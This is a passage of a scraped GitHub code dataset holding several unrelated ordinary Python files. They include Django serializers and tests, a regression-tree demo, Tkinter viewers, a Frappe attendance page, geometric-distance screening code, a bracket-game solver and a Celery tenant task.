peer_info[0][0]['addr'])\n\nif __name__ == '__main__':\n NetTest().main()\n","repo_name":"LUX-Core/lux","sub_path":"test/functional/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":3836,"dataset":"github-code","pt":"37"} +{"seq_id":"40861719675","text":"from rest_framework import serializers\nfrom goods_map.goods.models import GoodsModel\n\n\nclass GoodsSerializers(serializers.ModelSerializer):\n class Meta:\n model = GoodsModel\n fields = ['id',\n 'name',\n # 'cost_price',\n 'wholesale_price',\n 'retail_price',\n # 'weight',\n 'store_hall',\n 'store_back',\n 'store_up',\n # 'stock'\n ]\n","repo_name":"Nurlan-Aliev/track_stock_back","sub_path":"goods_map/goods/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6139664893","text":"# Importa las bibliotecas necesarias\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nimport matplotlib.pyplot as plt\r\n\r\n# Cargar los datos y preparar el Data Frame\r\ndf = pd.read_csv(r'D:\\Germán\\Desktop\\Python Files\\automobile.csv')\r\ndf = df.dropna(axis=0)\r\n\r\n# Separar las características x e y\r\nx = df[['horsepower']]\r\ny = df['price']\r\n\r\n# Entrena el árbol de regresión\r\nregression_tree = DecisionTreeRegressor(max_depth=2)\r\nregression_tree.fit(x, y)\r\n\r\n# Predice valores para nuevos datos\r\nx_test = np.arange(0.0, 250.0, 1)[:, np.newaxis] # Ajusta el rango de x_test según tus datos\r\ny_pred = regression_tree.predict(x_test)\r\n\r\n# Grafica los resultados\r\nplt.figure()\r\nplt.scatter(x, y, s=20, edgecolor=\"black\", c=\"darkorange\", label=\"Datos\")\r\nplt.plot(x_test, y_pred, color=\"cornflowerblue\", lw=2, label=\"Predicción\")\r\nplt.xlabel(\"Potencia (HP)\")\r\nplt.ylabel(\"Precio\")\r\nplt.title(\"Árbol de Regresión\")\r\nplt.legend()\r\nplt.show()\r\n","repo_name":"GermanMer/Regression","sub_path":"58_ArbolDeRegresion_CaracteristicaNumerica.py","file_name":"58_ArbolDeRegresion_CaracteristicaNumerica.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1468813516","text":"class Biblioteka:\n def __init__(self):\n self.limit_wypozyczen = 3\n self.egzemplarze = []\n self.ksiazki = []\n\n def dodaj(self, tytul, autor, rok_wydania):\n ksiazka = Ksiazka(tytul, autor)\n egzemplarz = Egzemplarz(ksiazka, 
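# Minimal sketch of the regression-tree fit used in the automobile sample
# above, on synthetic data so it runs without the CSV (values hypothetical):
import numpy as np
from sklearn.tree import DecisionTreeRegressor

x = np.arange(0, 100, dtype=float).reshape(-1, 1)   # stand-in for horsepower
y = 50.0 * x.ravel() + 1000.0                       # stand-in for price
tree = DecisionTreeRegressor(max_depth=2).fit(x, y)
print(tree.predict([[25.0], [75.0]]))   # piecewise-constant leaf means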
rok_wydania)\n\n self.egzemplarze.append(egzemplarz)\n\n for k in self.ksiazki:\n if k.tytul == tytul and k.autor == autor:\n k.liczba += 1\n return\n \n self.ksiazki.append(ksiazka)\n \n\nclass Ksiazka:\n def __init__(self, tytul, autor):\n self.tytul = tytul\n self.autor = autor\n self.liczba = 1\n\n def __repr__(self):\n return repr((self.tytul, self.autor, self.liczba))\n\n\nclass Egzemplarz:\n def __init__(self, ksiazka, rok_wydania):\n self.ksiazka = ksiazka\n self.rok_wydania = rok_wydania\n self.wypozyczony = False\n\n def __repr__(self):\n return repr((self.ksiazka.tytul, self.ksiazka.autor, self.rok_wydania))\n\n\nb = Biblioteka()\n\nn = int(input())\n\nfor i in range(0, n):\n k = eval(input())\n b.dodaj(k[0], k[1], k[2])\n\nb.ksiazki.sort(key=lambda x: x.tytul)\n\nfor ksiazka in b.ksiazki:\n print(ksiazka)","repo_name":"uep-inz-opr/7_biblioteka1-ksosulska","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33896755446","text":"from tkinter import *\r\nimport pandas as pd\r\nfrom tkinter import ttk\r\n\r\nroot=Tk()\r\nroot.geometry(\"700x500\")\r\n\r\nstyle = ttk.Style()\r\nstyle.theme_use('clam')\r\n\r\nmy_frame = Frame(root) #create frame\r\nmy_frame.pack(pady=20)\r\n\r\nmy_tree = ttk.Treeview(my_frame) #create treeview\r\n\r\ndf = pd.read_csv(\"sample CSV file.csv\") #path\r\n\r\nmy_tree[\"column\"] = list(df.columns) #setup new treeview\r\nmy_tree[\"show\"] = \"headings\"\r\n\r\nfor column in my_tree[\"column\"]: #Loop thru column list\r\n my_tree.heading(column , text=column , anchor=CENTER)\r\n my_tree.column(\"Sno\",width=30 , anchor=CENTER)\r\n my_tree.column(\"Customer Name\",width=100)\r\n my_tree.column(\"PO No\",width=80)\r\n my_tree.column(\"PO Date\",width=80)\r\n my_tree.column(\"Buyer Name\",width=100)\r\n my_tree.column(\"Lbl By Days\",width=80)\r\n my_tree.column(\"Lbl Date\",width=80)\r\n\r\ndf_rows = df.to_numpy().tolist() #put data in treeview\r\nfor rows in df_rows:\r\n my_tree.insert(\"\",\"end\",value=rows)\r\n\r\nmy_tree.pack() #pack the treeview finally\r\nroot.mainloop()\r\n","repo_name":"Vedavyaskota/Tkinter-csv2barchats-and-Dataframes","sub_path":"data frame.py","file_name":"data frame.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22770197147","text":"import utils\nimport network\nimport samples\nimport Tkinter\n\nclass Visualizer:\n\n def __init__(self, root, network, samples):\n self.epochs = 0\n self.root = root\n self.network = network\n self.samples = samples\n self.testSamples = samples.load('testing')\n self.root.configure(bg = utils.BG_COLOR, padx = 10, pady = 10)\n\n\n \"\"\"\n Handles the creation and placement of graphical elements\n on the interface.\n \"\"\"\n def gui_init(self):\n epoch_button = Tkinter.Button(self.root, text = \"Train 1 Epoch\",\n command = lambda: self.train_epoch(), relief = 'flat', bd = 2,\\\n font = utils.FONT, bg = utils.BUTTON_COLOR, highlightthickness = 0,\\\n highlightbackground = utils.EDGE_COLOR, fg = utils.TEXT_COLOR)\n epoch_button.grid(row = 1, column = 2, padx = 10, pady = 10, sticky = 'S')\n\n next_button = Tkinter.Button(self.root, text = \"Next Sample\",\n command = lambda: self.display_sample(), relief = 'flat', bd = 2,\\\n font = utils.FONT, bg = utils.BUTTON_COLOR, highlightthickness = 0,\\\n highlightbackground = utils.EDGE_COLOR, fg = 
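# The Treeview setup above configures each CSV column by hand; driving both
# the headings and the rows from df.columns keeps it generic. Sketch only,
# assuming the same imports and an existing DataFrame df:
my_tree["column"] = list(df.columns)
my_tree["show"] = "headings"
for column in df.columns:
    my_tree.heading(column, text=column)
    my_tree.column(column, width=80, anchor=CENTER)
for row in df.to_numpy().tolist():
    my_tree.insert("", "end", values=row)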
utils.TEXT_COLOR)\n next_button.grid(row = 3, column = 2, padx = 10, pady = 10, sticky = 'N')\n\n self.display = Tkinter.Canvas(self.root, width = 596, height = 596,\\\n bg = utils.BG_COLOR, highlightthickness = 0)\n\n self.sampleDisplay = Tkinter.Canvas(self.root, width = 168, height = 168,\\\n bg = utils.BG_COLOR, highlightthickness = 0)\n\n \"\"\"\n Load in test data, and run the network on data, returning overall\n accuracy.\n \"\"\"\n def get_test_data(self):\n self.testSamples = self.samples.load('testing')\n samples = self.samples.load('testing')\n data = []\n accuracy = 0\n\n for test in range(utils.TEST_TIMES):\n label, sample = samples.next()\n datum = self.network.classify(sample)\n accuracy += datum == label\n data.append((datum, label))\n\n return (data, accuracy * 100 / float(utils.TEST_TIMES))\n\n \"\"\"\n Display a representation of the network's accuracy, where red blocks\n signify incorrectly classified data, while green blocks signify correctly\n classified data.\n \"\"\"\n def display_data(self, data):\n self.display.delete('all')\n offset = 4\n size = 2\n\n for i in range(utils.TEST_TIMES):\n x = (size + offset) * (i % 100)\n y = (size + offset) * (i / 100)\n color = utils.GREEN_COLOR if data[i][0] == data[i][1] else utils.RED_COLOR\n self.display.create_rectangle(x, y, x + size, y + size,\\\n fill = color, width = 0)\n self.display.grid(row = 0, column = 0, columnspan = 3, padx = 10, pady = 10)\n\n #Draw the MNIST image to the interface, and update.\n def display_sample(self):\n self.sampleDisplay.delete('all')\n size = 6\n label, sample = next(self.testSamples, (None, None))\n\n if label is None and sample is None:\n self.testSamples = self.samples.load('testing')\n label, sample = next(self.testSamples, (None, None))\n\n for i in range(784):\n color = tuple([max(33, sample[i] * 64)] * 3)\n self.sampleDisplay.create_rectangle((i % 28) * size, \\\n (i / 28) * size, (i % 28 + 1) * size, (i / 28 + 1) * size,\\\n fill = \"#%02x%02x%02x\" % color, outline = utils.BG_COLOR)\n\n output = self.network.classify(sample)\n self.sampleDisplay.grid(row = 1, column = 0, rowspan = 3, padx = 10, pady = 10, sticky = 'W')\n entry = Tkinter.Entry(self.root, highlightbackground = utils.BG_COLOR,\\\n bd = 0, width = 1, font = utils.CLASS_FONT, justify = 'center')\n\n entry.insert(0, \"%s\" % str(output))\n entry.configure(state = 'disabled', disabledbackground = utils.BG_COLOR,\\\n disabledforeground = utils.GREEN_COLOR if output == label else utils.RED_COLOR)\n entry.grid(row = 1, column = 1, rowspan = 3, padx = 10, pady = 10)\n\n self.root.update_idletasks()\n self.root.update()\n\n def display_title(self, accuracy):\n msg = \"Epoch %s, %s percent accurate\" % (self.epochs, accuracy)\n self.root.title(msg)\n\n #Update all elements of the interface\n def gui_update(self):\n data, accuracy = self.get_test_data()\n self.display_data(data)\n self.display_title(accuracy)\n self.display_sample()\n self.root.update_idletasks()\n self.root.update()\n\n \"\"\"\n Trains for 1 epoch, and then updates the interface to reflect the\n network's change in accuracy.\n \"\"\"\n def train_epoch(self):\n self.epochs += 1\n training_samples = self.samples.load('training')\n msg = \"Training...\"\n self.root.title(msg)\n self.root.update_idletasks()\n self.root.update()\n\n for train in range(utils.TRAIN_TIMES):\n label = [0] * 10\n index, sample = training_samples.next()\n label[index] = 1\n self.network.train(sample, label)\n self.gui_update()\n\ndef main(*args):\n bias = True\n net = 
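# The "#%02x%02x%02x" trick in display_sample() above builds a Tk grayscale
# color from a single intensity; a tiny helper makes the clamping explicit
# (sketch only; 33 mirrors the sample's max(33, ...) floor):
def gray(intensity, floor=33):
    v = max(floor, min(255, int(intensity)))
    return "#%02x%02x%02x" % (v, v, v)

assert gray(0) == "#212121" and gray(255) == "#ffffff"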
network.Network(utils.NET_STRUCTURE, 0.01, bias)\n root = Tkinter.Tk()\n visualizer = Visualizer(root, net, samples)\n visualizer.gui_init()\n visualizer.gui_update()\n root.mainloop()\n\nmain()\n","repo_name":"tonylpan/neural-net","sub_path":"visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":5460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72974056747","text":"\n\nfrom __future__ import unicode_literals\n\nimport frappe, json\nfrom frappe import _dict\nimport frappe.share\nfrom frappe import _\nfrom frappe.utils import cint\nfrom frappe.boot import get_allowed_reports\nfrom frappe.permissions import get_roles, get_valid_perms \nfrom frappe.instructor import *\nfrom frappe.student import *\nfrom frappe.core.doctype.domain_settings.domain_settings import get_active_modules\nfrom datetime import date, timedelta,datetime\nimport locale\n\nno_cache = 1\n\n\t\n\ndef get_attendance(group):\n\tl = [r[:8] for r in frappe.db.sql(\"\"\"select student,student_name,sc.course,sc.instructor,att.status,att.date,emp.from_time,emp.to_time from `tabStudent Attendance` as att, `tabCourse Schedule` as sc, `tabEmploi` as emp where att.course_schedule=sc.name and att.emploi=emp.name and att.student_group=%s \"\"\",(group,) )]\n\treturn l\n\n\ndef get_context(context):\n\tdays=[\"Lundi\",\"Mardi\",\"Mercredi\",\"Jeudi\",\"Vendredi\",\"Samedi\",\"Dimanche\"]\n\tuser = frappe.session.user\n\tcontext.user=user\n\tcontext.classes=get_classes(user)\n\tgroup = frappe.request.environ.get('QUERY_STRING')\n\tgroup=group.replace(\"%20\",\" \")\n\tpage=\"\"\n\tif \"?\" in group:\n\t\tgroup,page=group.split(\"?\")\n\t\tif page.isdigit():\n\t\t\tpage=int(page)\n\t\telse:\n\t\t\tfrappe.local.flags.redirect_location = \"/instructeur/presence\"\n\t\t\traise frappe.Redirect\n\telse:\n\t\tpage=1\n\t\n\tcontext.page=page\n\tif group !=\"\" and group not in context.classes:\n\t\tfrappe.local.flags.redirect_location = \"/instructeur/presence\"\n\t\traise frappe.Redirect\n\tcontext.group=group\n\tcontext.students=get_students(group)\n\tfor i in range(len(context.students)) :\n\t\tcontext.students[i] = name_student(context.students[i])\n\ttoday = datetime.now()\n\tcontext.jour=days[today.weekday()]\n\tcontext.today= today.strftime(\"%d-%m-%Y\")\n\tcontext.calendar= getschedule('A' ,day=context.jour,groupe=group)\n\tallc=[]\n\tdi=[]\n\tfor i in range(6):\n\t\tsc=getschedule('A' ,day=days[i],groupe=group)\n\t\tdi.append([days[i],len(sc)])\n\t\tallc.append([days[i],sc])\n\tcontext.allc=allc\n\tcontext.di=di\n\tstart = today - timedelta(days=today.weekday())\n\tend = start + timedelta(days=6)\n\tstart = start.strftime(\"%d-%m-%y\")\n\tend= end.strftime(\"%d-%m-%y\")\n\tcontext.semaine=[start,end]\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n","repo_name":"bahaou/pages","sub_path":"instructeur/presence.py","file_name":"presence.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6226742875","text":"import os\nimport numpy as np\nimport sys\nimport pdb\n\nfrom tqdm import tqdm\n\nimport torch\nimport torch.multiprocessing as mp\n\nPROJECT_DIR = os.path.abspath(os.path.join(os.getcwd(), '..'))\nsys.path.insert(0, PROJECT_DIR)\n\n# from visualize_geo_dist import load_geo_dist\nfrom supercon.setup_geo_distance import compute_raw_ranking\n\n\ndef load_geo_dist(scene):\n \"\"\"\n Load pre-computed geometric distance table.\n 
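# The presence page above derives the current week from weekday(): Monday is
# weekday 0, so subtracting it lands on the week's start. Stand-alone sketch:
from datetime import datetime, timedelta

today = datetime.now()
start = today - timedelta(days=today.weekday())   # Monday of this week
end = start + timedelta(days=6)                   # Sunday of this week
print(start.strftime("%d-%m-%y"), end.strftime("%d-%m-%y"))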
\"\"\"\n geo_dist_path = os.path.abspath(os.path.join(PROJECT_DIR, \"datasets\", scene, 'geo_dist.dat'))\n assert os.path.exists(geo_dist_path)\n print('Load geometric distance from {:s}...'.format(geo_dist_path))\n geo_dist_dict = torch.load(geo_dist_path)\n geo_dist = geo_dist_dict['geo_dist'].cpu() # raw distance table, debug purpose\n\n sim_data = geo_dist_dict['sim_data'].cpu()\n dict_name_to_idx = geo_dist_dict['dict_name_to_idx']\n dict_idx_to_name = geo_dist_dict['dict_idx_to_name']\n hyper_params = geo_dist_dict['hyper_params']\n dict_supercon = geo_dist_dict['dict_supercon']\n dict_ranking = geo_dist_dict['dict_ranking'] # raw ranking dict, debug purpose\n feasible_anchor = geo_dist_dict['feasible_anchor']\n trans_dist = geo_dist_dict['trans_dist'].cpu()\n\n # dict_inv_ranking_path = os.path.abspath(os.path.join(PROJECT_DIR, \"datasets\", scene, 'dict_inv_ranking.dat'))\n # with open(dict_inv_ranking_path, 'rb') as f:\n # dict_inv_ranking = pickle.load(f)\n\n _, dict_inv_ranking = compute_raw_ranking(geo_dist, torch.sum(sim_data).item())\n\n # pdb.set_trace()\n\n return sim_data, dict_name_to_idx, dict_idx_to_name, hyper_params, dict_supercon, dict_ranking, dict_inv_ranking, feasible_anchor, trans_dist\n\n\ndef check_backward_ranking(sample_ranking, anchor_id, k_percentage, reverse=False):\n \"\"\"\n Check backward ranking/re-ranking constraint.\n \"\"\"\n if isinstance(sample_ranking, list) and isinstance(sample_ranking[0], np.ndarray):\n sample_ranking_cat = np.stack(sample_ranking, axis=0) # [B, N]\n if reverse:\n sample_ranking_cat = sample_ranking_cat[:, ::-1] \n b_rank_rows, backward_rank_ls = np.where(sample_ranking_cat == anchor_id)\n assert np.array_equal(np.sort(b_rank_rows), np.arange(sample_ranking_cat.shape[0])), print(b_rank_rows) # sanity check, anchor_id should appear in each row once and only once\n critical_backward_rank = np.ceil(sample_ranking_cat.shape[1] * k_percentage).astype('int')\n return backward_rank_ls < critical_backward_rank # [B, ]\n elif isinstance(sample_ranking, np.ndarray):\n assert anchor_id in sample_ranking # sanity check\n if reverse:\n sample_ranking = sample_ranking[::-1]\n backward_rank = int(np.where(sample_ranking == anchor_id)[0]) # reciprocal rank of anchor seen from sample\n critical_backward_rank = np.ceil(len(sample_ranking) * k_percentage).astype('int') # top/bottom k% re-ranking\n return backward_rank < critical_backward_rank # scalar\n else:\n raise NotImplementedError\n \n \ndef _backbone_trim_ranking(trans_dist_vec, dict_ranking,\n in_dom_pos_cand, in_dom_pos_cand_inv_rank,\n cross_dom_pos_cand, cross_dom_pos_cand_inv_rank,\n in_dom_neg_cand, in_dom_neg_cand_inv_rank,\n cross_dom_neg_cand, cross_dom_neg_cand_inv_rank,\n pos_max_trans, pos_backward_coef, neg_backward_coef,\n dict_supercon, i_anchor, feasible_anchor, mp_progress, mp_lock):\n\n print(\"\\rProgress: {:d} / {:d}\".format(mp_progress.value, len(dict_supercon)), flush=True, end=' ')\n # store top k% in-domain positives with re-ranking\n flag_re_ranking = in_dom_pos_cand_inv_rank < len(dict_ranking[in_dom_pos_cand[0]]['same']) * pos_backward_coef\n flag_pos_max_trans = np.take(trans_dist_vec, in_dom_pos_cand) < pos_max_trans\n in_dom_positives = in_dom_pos_cand[np.logical_and(flag_re_ranking, flag_pos_max_trans)] # to save\n\n # store top k% cross-domain positives with re-ranking\n flag_re_ranking = cross_dom_pos_cand_inv_rank < len(dict_ranking[cross_dom_pos_cand[0]]['diff']) * pos_backward_coef\n flag_pos_max_trans = np.take(trans_dist_vec, cross_dom_pos_cand) < 
pos_max_trans\n cross_dom_positives = cross_dom_pos_cand[np.logical_and(flag_re_ranking, flag_pos_max_trans)] # to save\n\n # store bottom k% in-domain negatives with re-ranking\n flag_re_ranking = in_dom_neg_cand_inv_rank > len(dict_ranking[in_dom_neg_cand[0]]['same']) * (1 - neg_backward_coef)\n in_dom_negatives = in_dom_neg_cand[flag_re_ranking] # to save\n\n # store bottom k% cross-domain negatives with re-ranking\n flag_re_ranking = cross_dom_neg_cand_inv_rank > len(dict_ranking[cross_dom_neg_cand[0]]['diff']) * (1 - neg_backward_coef)\n cross_dom_negatives = cross_dom_neg_cand[flag_re_ranking] # to save\n\n # aggregate into a dict\n dict_anchor = {\n \"positive\": {\"same\": in_dom_positives, \"diff\": cross_dom_positives},\n \"negative\": {\"same\": in_dom_negatives, \"diff\": cross_dom_negatives}\n }\n dict_supercon[i_anchor] = dict_anchor\n \n if len(cross_dom_positives) > 0:\n feasible_anchor.append(i_anchor)\n\n with mp_lock:\n mp_progress.value += 1\n print(\"\\rProgress: {:d} / {:d}\".format(mp_progress.value, len(dict_supercon)), flush=True, end=' ')\n \n\ndef trim_ranking(dict_ranking, dict_inv_ranking, trans_dist, pos_forward_coef, pos_backward_coef, pos_max_trans, neg_forward_coef, neg_backward_coef):\n \"\"\"\n Thresholding to get feasible anchors and the associated prescreened positives and negatives.\n \"\"\"\n \n dict_supercon = {}\n feasible_anchor = []\n\n for i_anchor in tqdm(range(len(dict_ranking)), desc='Sample thresholding based on reciprocal rank: O(n)'):\n trans_dist_vec = trans_dist[i_anchor]\n\n # store top k% in-domain positives with re-ranking\n in_dom_pos_cand = dict_ranking[i_anchor]['same']\n in_dom_pos_cand = in_dom_pos_cand[:np.ceil(pos_forward_coef * len(in_dom_pos_cand)).astype('int')]\n in_dom_pos_cand_inv_rank = np.array([dict_inv_ranking[i_sample]['same'][i_anchor] for i_sample in in_dom_pos_cand])\n flag_re_ranking = in_dom_pos_cand_inv_rank < len(dict_ranking[in_dom_pos_cand[0]]['same']) * pos_backward_coef\n flag_pos_max_trans = np.take(trans_dist_vec, in_dom_pos_cand) < pos_max_trans\n in_dom_positives = in_dom_pos_cand[np.logical_and(flag_re_ranking, flag_pos_max_trans)] # to save\n\n # store top k% cross-domain positives with re-ranking\n cross_dom_pos_cand = dict_ranking[i_anchor]['diff']\n cross_dom_pos_cand = cross_dom_pos_cand[:np.ceil(pos_forward_coef * len(cross_dom_pos_cand)).astype('int')]\n cross_dom_pos_cand_inv_rank = np.array([dict_inv_ranking[i_sample]['diff'][i_anchor] for i_sample in cross_dom_pos_cand])\n flag_re_ranking = cross_dom_pos_cand_inv_rank < len(dict_ranking[cross_dom_pos_cand[0]]['diff']) * pos_backward_coef\n flag_pos_max_trans = np.take(trans_dist_vec, cross_dom_pos_cand) < pos_max_trans\n cross_dom_positives = cross_dom_pos_cand[np.logical_and(flag_re_ranking, flag_pos_max_trans)] # to save\n\n # store bottom k% in-domain negatives with re-ranking\n in_dom_neg_cand = dict_ranking[i_anchor]['same']\n in_dom_neg_cand = in_dom_neg_cand[-np.ceil(neg_forward_coef * len(in_dom_neg_cand)).astype('int'):]\n in_dom_neg_cand_inv_rank = np.array([dict_inv_ranking[i_sample]['same'][i_anchor] for i_sample in in_dom_neg_cand])\n flag_re_ranking = in_dom_neg_cand_inv_rank > len(dict_ranking[in_dom_neg_cand[0]]['same']) * (1 - neg_backward_coef)\n in_dom_negatives = in_dom_neg_cand[flag_re_ranking] # to save\n\n # store bottom k% cross-domain negatives with re-ranking\n cross_dom_neg_cand = dict_ranking[i_anchor]['diff']\n cross_dom_neg_cand = cross_dom_neg_cand[-np.ceil(neg_forward_coef * 
len(cross_dom_neg_cand)).astype('int'):]\n cross_dom_neg_cand_inv_rank = np.array([dict_inv_ranking[i_sample]['diff'][i_anchor] for i_sample in cross_dom_neg_cand])\n flag_re_ranking = cross_dom_neg_cand_inv_rank > len(dict_ranking[cross_dom_neg_cand[0]]['diff']) * (1 - neg_backward_coef)\n cross_dom_negatives = cross_dom_neg_cand[flag_re_ranking] # to save\n\n # aggregate into a dict\n dict_anchor = {\n \"positive\": {\"same\": in_dom_positives, \"diff\": cross_dom_positives},\n \"negative\": {\"same\": in_dom_negatives, \"diff\": cross_dom_negatives}\n }\n dict_supercon[i_anchor] = dict_anchor\n\n if len(cross_dom_positives) > 0:\n feasible_anchor.append(i_anchor)\n\n return dict_supercon, feasible_anchor\n\n\ndef main():\n # Recap on raw data structure\n coords = torch.load(os.path.join(PROJECT_DIR, 'datasets/EPFL/test_real/init/EPFL_2020-09-17-piloted_00035_DJI_0067.dat'))\n print(\"Coordinate raw data shape {}\".format(coords.shape))\n\n depth = torch.load(os.path.join(PROJECT_DIR, 'datasets/EPFL/test_real/depth/EPFL_2020-09-17-piloted_00035_DJI_0067.dat'))\n print(\"Depth raw data shape {}\".format(depth.shape))\n\n normal = torch.load(os.path.join(PROJECT_DIR, 'datasets/EPFL/test_real/normal/EPFL_2020-09-17-piloted_00035_DJI_0067.dat'))\n print(\"Normal raw data shape {}\".format(normal.shape))\n\n scene = 'EPFL'\n\n # read geo distance table\n sim_data, dict_name_to_idx, dict_idx_to_name, hyper_params, dict_supercon, dict_ranking, dict_inv_ranking, feasible_anchor, trans_dist = load_geo_dist(scene)\n print('%d / %d samples are feasible anchors after pre-screening.' % (len(feasible_anchor), len(sim_data)))\n\n # check the simple concatenation of sim-real data\n sim_size = sim_data.sum().item()\n for i in range(len(sim_data)):\n if i < sim_size:\n assert sim_data[i]\n else:\n assert ~sim_data[i]\n real_size = len(sim_data) - sim_size\n\n torch.cuda.empty_cache()\n\n trans_dist = trans_dist.cpu().numpy()\n new_dict_supercon, new_feasible_anchor = trim_ranking(dict_ranking, dict_inv_ranking, trans_dist, pos_max_trans=150,\n pos_forward_coef=0.01, pos_backward_coef=0.05,\n neg_forward_coef=0.05, neg_backward_coef=0.05)\n\n pdb.set_trace()\n\n\nif __name__ == '__main__':\n mp.set_start_method('spawn')\n\n main()\n","repo_name":"Shanci-Li/visnav_semantics","sub_path":"CrossLoc/_helper/geo_dist_screening.py","file_name":"geo_dist_screening.py","file_ext":"py","file_size_in_byte":10480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25055021438","text":"from django.test import TestCase\nfrom .models import MenuItem, Booking\n\nclass MenuItemTest(TestCase):\n def test_get_item(self):\n item = MenuItem.objects.create(title=\"ice cream\", price=30, inventory=12)\n itemstr = item.get_item()\n\n self.assertEqual(itemstr, \"ice cream : 30\")\n\nclass BookingTest(TestCase):\n def test_get_booking(self):\n booking = Booking.objects.create(Name=\"ahmad2\", No_of_guests=3, BookingDate=\"2023-06-21T20:21:00Z\")\n itemstr = booking.get_booking()\n\n self.assertEqual(itemstr, \"ahmad2\")","repo_name":"Ahmadra221/littlelemon2","sub_path":"resturant/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38894487548","text":"#!/usr/bin/python3\n#Risale dalla foglia verso la radice per cercare la mossa vincente\nimport fileinput\nimport sys \nsys.setrecursionlimit(10**5) \nfrom collections import deque\ndef 
BUCKET(ID = -1, start = -1, end = -1, father = -1):\n a = [ID, start, end, father]\n return a\n\nCACHE = []\nALL_BUCKETS = []\nTREE_BUCKETS = []\ndef DFS(index, ignore = -1):\n global CACHE\n if(CACHE[index] != -1):\n return CACHE[index]\n risposta = 0\n for i in TREE_BUCKETS[index]:\n if(ALL_BUCKETS[i][0] != ignore):\n risposta = risposta ^ (DFS(i, ignore) + 1)\n CACHE[index] = risposta\n return risposta\n\n\ndef init_globals(N):\n toReserve = int(N/2 + 1)\n global TREE_BUCKETS\n TREE_BUCKETS = [[] for _ in range (toReserve)]\n global ALL_BUCKETS\n ALL_BUCKETS = [BUCKET() for _ in range(toReserve)]\n ALL_BUCKETS[0] = BUCKET(0, 0, -1, 0)\n global CACHE\n CACHE = [-1 for _ in range(toReserve)]\n\ndef parser(parentesi):\n init_globals(len(parentesi))\n stack = deque()\n globalID = 0\n index = 0\n stack.appendleft(globalID)\n global ALL_BUCKETS\n global TREE_BUCKETS\n global CACHE\n for c in parentesi:\n if(c == '('):\n globalID+=1\n ALL_BUCKETS[globalID] = BUCKET(globalID, index, -1, stack[0])\n TREE_BUCKETS[stack[0]].append(globalID)\n stack.appendleft(globalID)\n elif(c == ')'):\n ALL_BUCKETS[stack[0]][2] = index\n stack.popleft()\n ALL_BUCKETS[stack[0]][2] = index\n else:\n exit(1)\n \n index += 1\n\nif __name__ == \"__main__\":\n N = int(sys.stdin.readline())\n parentesi = sys.stdin.readline()\n parentesi = parentesi[:-1]\n assert(N == len(parentesi))\n\n parser(parentesi)\n\n risp = DFS(0)\n\n if(0): #debug\n print(TREE_BUCKETS)\n print()\n for _ in ALL_BUCKETS:\n print(_)\n print()\n print(CACHE)\n\n if(risp != 0):\n print(1)\n for i in range(1,len(CACHE)):\n j = i\n tryOne = CACHE[ALL_BUCKETS[j][3]] ^ (CACHE[j] + 1) #nulla i\n j = ALL_BUCKETS[j][3] #father\n while(j != 0): #ricalcola i valori fino alla radice\n tryOne = (tryOne + 1) ^ CACHE[ALL_BUCKETS[j][3]] ^ (CACHE[j] + 1)\n j = ALL_BUCKETS[j][3]\n if(tryOne == 0):\n print(ALL_BUCKETS[i][1], ALL_BUCKETS[i][2])\n break\n else:\n print(0)","repo_name":"romeorizzi/esami-algo-public","sub_path":"2020-09-18/gioco_parentesi/sol/traduzione_noclass_speedup.py","file_name":"traduzione_noclass_speedup.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"14389273565","text":"import celery\nfrom celery.app.task import Task\nfrom django.db import connection\n\nfrom tenant_schemas_celery.cache import SimpleCache\n\n_shared_storage = {}\n\n\nclass SharedTenantCache(SimpleCache):\n def __init__(self):\n super(SharedTenantCache, self).__init__(storage=_shared_storage)\n\n\nclass TenantTask(Task):\n \"\"\" Custom Task class that injects db schema currently used to the task's\n keywords so that the worker can use the same schema.\n \"\"\"\n\n abstract = True\n\n tenant_cache_seconds = None\n tenant_databases = None\n\n @classmethod\n def get_tenant_databases(cls):\n \"\"\"Return the databases where the schema should be switched\"\"\"\n if cls.tenant_databases is not None:\n return cls.tenant_databases\n if hasattr(cls.app.conf, \"task_tenant_databases\") is True:\n return cls.app.conf.task_tenant_databases\n return (\"default\", )\n\n @classmethod\n def tenant_cache(cls):\n return SharedTenantCache()\n\n @classmethod\n def get_tenant_for_schema(cls, schema_name):\n from .compat import get_tenant_model\n\n missing = object()\n cache = cls.tenant_cache()\n cached_value = cache.get(schema_name, default=missing)\n tenant_cache_seconds = cls.tenant_cache_seconds\n if tenant_cache_seconds is None: # if not set at task level\n try: # to get from global 
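# The DFS above computes a Sprague-Grundy value for the bracket game: each
# node's value is the XOR over its children of (child_value + 1), and a
# nonzero root value means the first player can win. A compact stand-alone
# version of the same rule (sketch, independent of the sample's arrays):
def grundy(s):
    stack, vals = [0], [0]            # index 0 is a virtual root
    for c in s:
        if c == '(':
            stack.append(len(vals)); vals.append(0)
        else:                         # ')': fold this node into its parent
            node = stack.pop()
            vals[stack[-1]] ^= vals[node] + 1
    return vals[0]

print(grundy('()'))     # 1 -> first player wins
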